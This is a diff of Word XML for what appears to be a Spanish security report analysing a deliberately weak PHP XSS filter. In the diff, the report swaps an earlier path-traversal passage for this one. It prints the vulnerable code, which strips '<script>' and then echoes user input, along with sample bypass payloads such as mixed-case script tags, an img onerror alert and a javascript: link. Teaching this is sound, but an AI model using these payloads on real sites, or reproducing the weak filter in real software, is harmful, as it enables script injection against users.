         <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="360" w:lineRule="auto"/>
         <w:jc w:val="both"/>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Finalmente el código intenta eliminar </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve">patrones peligrosos, por un lado elimina el posible reemplazo de “http/s://” previniendo ataques RFI; y por otro los caracteres </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>“..</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>/”, “..\” evitando la navegación de directorios</w:t>
+          <w:i/>
+          <w:iCs/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="4472C4" w:themeColor="accent1"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:shadow w14:blurRad="38100" w14:dist="25400" w14:dir="5400000" w14:sx="100000" w14:sy="100000" w14:kx="0" w14:ky="0" w14:algn="ctr">
+            <w14:srgbClr w14:val="6E747A">
+              <w14:alpha w14:val="57000"/>
+            </w14:srgbClr>
+          </w14:shadow>
+          <w14:textOutline w14:w="0" w14:cap="flat" w14:cmpd="sng" w14:algn="ctr">
+            <w14:noFill/>
+            <w14:prstDash w14:val="solid"/>
+            <w14:round/>
+          </w14:textOutline>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">$name = str_replace( '&lt;script&gt;', '', $_GET[ 'name' ] ); </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">El código intenta prevenir ataques XSS reemplazando la cadena </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:i/>
+          <w:iCs/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">`&lt;script&gt;` </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>por nada</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -4172,13 +4119,81 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>mediante ataques “Path Traversal”</w:t>
+          <w:i/>
+          <w:iCs/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>,”,</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> en la entrada del usuario</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, siendo </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> método extremadamente ineficaz y fácil de evadir</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, ya que un atacante </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>podría utilizar muchas otras técnicas para inyectar código malicioso</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>, como variaciones en el etiquetado</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -4194,277 +4209,622 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>.</w:t>
+          <w:i/>
+          <w:iCs/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="CdigoHTML"/>
+          <w:rFonts w:ascii="Arial" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>&lt;scripT&gt;</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="simtextwritetextbodyhfvfn"/>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> o </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="CdigoHTML"/>
+          <w:rFonts w:ascii="Arial" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>&lt;ScRiPt&gt;</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="simtextwritetextbodyhfvfn"/>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>,</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>eventos JavaScript</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> que no contienen esa etiqueta </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:i/>
+          <w:iCs/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="CdigoHTML"/>
+          <w:rFonts w:ascii="Arial" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>&lt;img src="x" onerror="alert('XSS')"</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="CdigoHTML"/>
+          <w:rFonts w:ascii="Arial" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>&gt;)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="CdigoHTML"/>
+          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="CdigoHTML"/>
+          <w:rFonts w:ascii="Arial" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>uso de entidades de HTML que represente a caracteres esp</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="CdigoHTML"/>
+          <w:rFonts w:ascii="Arial" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>e</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="CdigoHTML"/>
+          <w:rFonts w:ascii="Arial" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>ci</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="CdigoHTML"/>
+          <w:rFonts w:ascii="Arial" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>a</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="CdigoHTML"/>
+          <w:rFonts w:ascii="Arial" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>les</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="CdigoHTML"/>
+          <w:rFonts w:ascii="Arial" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>(&lt;script&gt;</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="simtextwritetextbodyhfvfn"/>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">  </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="simtextwritetextbodyhfvfn"/>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:sym w:font="Wingdings" w:char="F0E0"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="simtextwritetextbodyhfvfn"/>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="CdigoHTML"/>
+          <w:rFonts w:ascii="Arial" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>&amp;lt;script&amp;gt;),</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="CdigoHTML"/>
+          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="CdigoHTML"/>
+          <w:rFonts w:ascii="Arial" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">o uso de JavaScript en atributos HTML </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="CdigoHTML"/>
+          <w:rFonts w:ascii="Arial" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>(&lt;a href="javascript:alert('XSS')"&gt;Click me&lt;/a&gt;)</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="360" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:b/>
-          <w:bCs/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:b/>
-          <w:bCs/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t xml:space="preserve">2.3.2.- </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:b/>
-          <w:bCs/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>Problemas de seguridad:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
+        <w:pStyle w:val="Prrafodelista"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="26"/>
+          <w:numId w:val="42"/>
         </w:numPr>
         <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="360" w:lineRule="auto"/>
         <w:jc w:val="both"/>
         <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>Validación de entrada insuficiente</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>, en el uso de “</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:rStyle w:val="CdigoHTML"/>
+          <w:rFonts w:ascii="Arial" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="4472C4" w:themeColor="accent1"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:shadow w14:blurRad="38100" w14:dist="25400" w14:dir="5400000" w14:sx="100000" w14:sy="100000" w14:kx="0" w14:ky="0" w14:algn="ctr">
+            <w14:srgbClr w14:val="6E747A">
+              <w14:alpha w14:val="57000"/>
+            </w14:srgbClr>
+          </w14:shadow>
+          <w14:textOutline w14:w="0" w14:cap="flat" w14:cmpd="sng" w14:algn="ctr">
+            <w14:noFill/>
+            <w14:prstDash w14:val="solid"/>
+            <w14:round/>
+          </w14:textOutline>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>echo "&lt;pre&gt;Hello ${name}&lt;/pre</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="4472C4" w:themeColor="accent1"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:shadow w14:blurRad="38100" w14:dist="25400" w14:dir="5400000" w14:sx="100000" w14:sy="100000" w14:kx="0" w14:ky="0" w14:algn="ctr">
+            <w14:srgbClr w14:val="6E747A">
+              <w14:alpha w14:val="57000"/>
+            </w14:srgbClr>
+          </w14:shadow>
+          <w14:textOutline w14:w="0" w14:cap="flat" w14:cmpd="sng" w14:algn="ctr">
+            <w14:noFill/>
+            <w14:prstDash w14:val="solid"/>
+            <w14:round/>
+          </w14:textOutline>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>&gt;“</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="4472C4" w:themeColor="accent1"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:shadow w14:blurRad="38100" w14:dist="25400" w14:dir="5400000" w14:sx="100000" w14:sy="100000" w14:kx="0" w14:ky="0" w14:algn="ctr">
+            <w14:srgbClr w14:val="6E747A">
+              <w14:alpha w14:val="57000"/>
+            </w14:srgbClr>
+          </w14:shadow>
+          <w14:textOutline w14:w="0" w14:cap="flat" w14:cmpd="sng" w14:algn="ctr">
+            <w14:noFill/>
+            <w14:prstDash w14:val="solid"/>
+            <w14:round/>
+          </w14:textOutline>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">;} </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="CdigoHTML"/>
+          <w:rFonts w:ascii="Arial" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>, como el código de nivel bajo,</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="4472C4" w:themeColor="accent1"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:shadow w14:blurRad="38100" w14:dist="25400" w14:dir="5400000" w14:sx="100000" w14:sy="100000" w14:kx="0" w14:ky="0" w14:algn="ctr">
+            <w14:srgbClr w14:val="6E747A">
+              <w14:alpha w14:val="57000"/>
+            </w14:srgbClr>
+          </w14:shadow>
+          <w14:textOutline w14:w="0" w14:cap="flat" w14:cmpd="sng" w14:algn="ctr">
+            <w14:noFill/>
+            <w14:prstDash w14:val="solid"/>
+            <w14:round/>
+          </w14:textOutline>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="CdigoHTML"/>
+          <w:rFonts w:ascii="Arial" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">imprime directamente la entrada del usuario en la página, lo que hace que el código sea vulnerable a inyecciones HTML/JavaScript. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="360" w:lineRule="auto"/>
+        <w:ind w:firstLine="360"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rStyle w:val="CdigoHTML"/>
+          <w:rFonts w:ascii="Arial" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="CdigoHTML"/>
+          <w:rFonts w:ascii="Arial" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>En resumen, e</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="CdigoHTML"/>
+          <w:rFonts w:ascii="Arial" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>ste código PHP intenta manejar una entrada de usuario a través del parámetro </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="CdigoHTML"/>
+          <w:rFonts w:ascii="Arial" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>“</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="CdigoHTML"/>
+          <w:rFonts w:ascii="Arial" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Arial" w:cs="Arial"/>
           <w:i/>
           <w:iCs/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>str_replace ()</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:i/>
-          <w:iCs/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>name</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="CdigoHTML"/>
+          <w:rFonts w:ascii="Arial" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
         <w:t>”</w:t>
       </w:r>
       <w:r>
